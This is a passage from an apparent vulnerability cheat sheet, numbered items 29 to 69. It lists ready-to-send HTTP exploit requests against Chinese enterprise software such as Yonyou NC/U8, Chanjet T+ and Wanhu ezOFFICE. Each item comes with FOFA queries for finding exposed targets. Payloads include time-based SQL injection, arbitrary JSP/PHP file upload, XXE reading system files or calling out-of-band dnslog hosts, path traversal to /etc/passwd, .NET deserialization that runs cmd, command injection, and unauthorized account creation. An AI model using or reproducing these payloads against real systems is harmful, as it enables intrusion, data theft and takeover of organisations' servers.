POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is present if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
